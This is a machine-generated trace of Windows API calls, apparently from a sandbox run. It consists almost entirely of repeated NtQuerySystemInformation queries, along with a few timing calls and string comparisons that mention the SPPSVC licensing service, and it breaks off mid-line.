NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0288.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0288.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0288.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0288.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0288.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0288.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0288.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x20, ResultLength=0x0) [0288.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0288.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0288.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0288.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0288.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0288.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0288.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0288.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0288.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0288.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x28, ResultLength=0x0) [0288.446] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0288.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0288.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0288.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d020, Length=0x28, ResultLength=0x0) [0288.447] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0288.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0288.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0288.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0288.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0288.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0288.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0288.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0288.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x28, ResultLength=0x0) [0288.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x28, ResultLength=0x0) [0288.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0288.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0288.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x20, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x20, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.468] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d100 | out: lpSystemTimeAsFileTime=0xa78207d100*(dwLowDateTime=0x39462f18, dwHighDateTime=0x1d6666a)) [0288.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0288.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0f0, Length=0x28, ResultLength=0x0) [0288.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x50, ResultLength=0x0) [0288.468] GetTickCount () returned 0x118825d [0288.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0288.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0288.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0288.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0288.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0288.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0288.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0288.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0288.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0288.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0288.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0288.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0288.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0288.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0288.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x28, ResultLength=0x0) [0288.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0288.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0288.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x20, ResultLength=0x0) [0288.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0288.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.510] 